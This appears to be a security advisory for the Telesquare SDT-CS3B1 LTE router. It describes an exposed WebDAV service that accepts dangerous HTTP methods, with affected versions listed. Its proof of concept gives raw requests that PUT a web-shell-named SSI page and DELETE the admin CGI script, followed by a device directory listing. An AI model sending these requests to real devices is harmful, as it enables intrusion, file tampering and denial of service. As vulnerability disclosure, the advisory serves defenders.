Telesquare SKT LTE Router SDT-CS3B1 WebDAV HTTP Methods Arbitrary File Events

### SummaryWe introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product.### DescriptionWebDAV is enabled with directory listing and dangerous HTTP methods allowed: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK and UNLOCK. The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. An attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of the server (by uploading server-executable code), or other attacks. The other methods can be used to delete/move/overwrite/create files and cause denial of service scenarios and/or phishing attacks.### VendorTelesquare Co., Ltd. – http://www.telesquare.co.kr### Affected Version* FwVer: SDT-CS3B1, sw version 1.2.0* LteVer: ML300S5XEA41_090 1 0.1.0* Modem model: PM-L300S### Tested On* lighttpd/1.4.20### PoC“`PUT /ssi.shtml HTTP/1.1User-Agent: ZSL_WebDAV_client/1.0Connection: TETE: trailersHost: 10.0.0.17:8081Content-Length: 29Content-Type: text/html<title>ZSL_SSI_wSHELL</title>“““DELETE /cgi-bin/admin.cgi HTTP/1.1User-Agent: ZSL_WebDAV_client/1.0Connection: TETE: trailersHost: 10.0.0.17:8081“`WebDAV EnabledDirectory listing of /:“`| WebDAV type: Unkown| Directory Listing: | http://10.0.0.17/| http://10.0.0.17/admin| http://10.0.0.17/webdav| http://10.0.0.17/login.shtml| http://10.0.0.17/firewall| http://10.0.0.17/traffic| http://10.0.0.17/js| http://10.0.0.17/serial| http://10.0.0.17/nas| http://10.0.0.17/leftMenu.html| http://10.0.0.17/internet| http://10.0.0.17/home.shtml| http://10.0.0.17/images| http://10.0.0.17/wifi2g| http://10.0.0.17/css| http://10.0.0.17/cgi-bin| http://10.0.0.17/amtlsq| http://10.0.0.17/top.shtml| http://10.0.0.17/modem| http://10.0.0.17/wifi5g| http://10.0.0.17/index.html| http://10.0.0.17/lte| http://10.0.0.17/m2mp| http://10.0.0.17/serialmodem“`